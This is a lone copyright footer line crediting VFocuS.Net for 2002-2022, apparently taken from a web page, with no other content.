CopyRight © 2002-2022 VFocuS.Net All Rights Reserved